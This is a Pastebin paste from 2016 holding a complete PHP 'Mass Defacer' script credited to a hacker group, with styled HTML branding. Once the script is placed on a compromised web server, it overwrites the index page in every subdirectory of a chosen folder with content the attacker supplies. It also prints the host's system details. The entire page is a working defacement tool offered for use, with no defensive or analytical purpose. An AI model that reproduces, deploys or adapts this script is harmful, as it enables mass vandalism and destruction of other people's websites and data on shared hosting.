Advertisement
zeeshan-haxor-zesn

Mass Defacer by Zeeshan Haxor - CyberTeamRox

Dec 19th, 2016
454
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.49 KB | None | 0 0
  1. <html>
  2. <TITLE>Mass Defacer - By Zeeshan Haxor(CyberTeamRox)</TITLE>
  3. <link href='https://pbs.twimg.com/profile_images/576236156573995008/MBmY1005.jpg' rel='SHORTCUT ICON'/>
  4. <head><style type="text/css">body { background: url("http://p1.pichost.me/i/13/1360479.jpgg") bottom right no-repeat fixed; background-color:black;}</style></head>
  5. <body></table><center><font face="Pirata One" size="10" color="black" style="text-shadow: 1px 0px .1em gold, -1px 1px .1em gold, -1px -1px .1em black"><b><font size='4'><font style="text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0); color: rgb(255, 255, 255); font-weight: bold;"><font style="color:yellow;size="2";text-align: center;font-family:Pirata One; text-shadow: 3px 3px 3px yellow;"> Mass Defacer by CyberTeamRox </font></center><center><center><img src="https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcQJLjYMEd-uAlqgf_RPIGxFcrcVJtvQ3BSERUbp2GVbby3Tc3s8"></center><br>
  6. <?php
  7. /*
  8. Mass Deface Script By ~Zeeshan Haxor
  9. Contact => http://facebook.com/zee.gov
  10. */
  11. echo php_uname();
  12. echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>";
  13. echo "<body bgcolor='black'><font color='white'><font face='Electrolize'>";
  14. echo "<center><form method='POST'>";
  15. echo "Base Dir : <input type='text' name='base_dir' size='50' value='".getcwd ()."'><br><br>";
  16. echo "File Name : <input type='text' name='file_name' value='index.php'><br><br>";
  17. echo "Your Index : <br><textarea style='width: 685px; height: 330px;' name='index'>//Put Your Index Here</textarea><br>";
  18. echo "<input type='submit' value='Start'></form></center>";
  19.  
  20. if (isset ($_POST['base_dir']))
  21. {
  22. if (!file_exists ($_POST['base_dir']))
  23. die ($_POST['base_dir']." Not Found !<br>");
  24.  
  25. if (!is_dir ($_POST['base_dir']))
  26. die ($_POST['base_dir']." Is Not A Directory !<br>");
  27.  
  28. @chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
  29.  
  30. $files = @scandir ($_POST['base_dir']) or die ("oh! shit Try Again <br>");
  31.  
  32. foreach ($files as $file):
  33. if ($file != "." && $file != ".." && @filetype ($file) == "dir")
  34. {
  35. $index = getcwd ()."/".$file."/".$_POST['file_name'];
  36. if (file_put_contents ($index, $_POST['index']))
  37. echo "$index&nbsp&nbsp&nbsp&nbsp<span style='color: green'>OK</span><br>";
  38. }
  39. endforeach;
  40. }
  41.  
  42. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement